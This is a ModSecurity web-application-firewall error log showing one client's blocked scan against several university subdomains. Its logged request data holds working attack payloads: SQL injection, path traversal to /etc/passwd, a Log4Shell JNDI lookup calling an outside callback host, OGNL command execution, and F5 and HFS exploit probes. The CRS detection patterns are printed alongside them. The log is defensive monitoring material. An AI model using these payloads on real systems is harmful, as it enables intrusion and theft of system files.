[Tue Aug 29 11:30:51.407296 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAOOuaQAAAAW"]
[Tue Aug 29 11:30:52.312003 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAO879cAAAAF"]
[Tue Aug 29 11:30:52.312967 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlghfs1u6m4g5btq.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10fMCo-f0AAAPOhbsAAAAa"]
[Tue Aug 29 11:30:52.335156 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10fMCo-f0AAAOM4Z4AAAAU"]
[Tue Aug 29 11:30:52.356789 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPQkh4AAAAe"]
[Tue Aug 29 11:30:52.361335 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPxBVYAAAAS"]
[Tue Aug 29 11:30:52.373805 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAPOhb0AAAAa"]
[Tue Aug 29 11:30:52.384925 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAO879oAAAAF"]
[Tue Aug 29 11:30:52.386227 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAP05GYAAAAA"]
[Tue Aug 29 11:30:52.387070 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOKNrwAAAAK"]
[Tue Aug 29 11:30:52.389252 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOOuacAAAAW"]
[Tue Aug 29 11:30:52.404154 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPRNdIAAAAf"]
[Tue Aug 29 11:30:52.405437 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPxBVgAAAAS"]
[Tue Aug 29 11:30:53.307754 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10fcCo-f0AAAPMmDwAAAAY"]
[Tue Aug 29 11:30:53.310318 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPPSyoAAAAd"]
[Tue Aug 29 11:30:53.311349 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOKNr0AAAAK"]
[Tue Aug 29 11:30:53.328469 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPMmD0AAAAY"]
[Tue Aug 29 11:30:53.331043 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOOuakAAAAW"]
[Tue Aug 29 11:30:53.342884 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOM4aMAAAAU"]
[Tue Aug 29 11:30:53.374279 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10fcCo-f0AAAOM4aQAAAAU"]
[Tue Aug 29 11:30:53.456863 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPPSywAAAAd"]
[Tue Aug 29 11:30:53.498601 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPDn1oAAAAP"]
[Tue Aug 29 11:30:53.510054 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAOOua0AAAAW"]
[Tue Aug 29 11:30:53.560578 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPPSy0AAAAd"]
[Tue Aug 29 11:30:54.316423 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPDn1wAAAAP"]
[Tue Aug 29 11:30:54.323267 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAOOua4AAAAW"]
[Tue Aug 29 11:30:54.412307 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAN@5AoAAAAO"]
[Tue Aug 29 11:30:54.417157 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPMmEQAAAAY"]
[Tue Aug 29 11:30:54.436258 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPDn2AAAAAP"]
[Tue Aug 29 11:30:54.466580 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAO87@QAAAAF"]
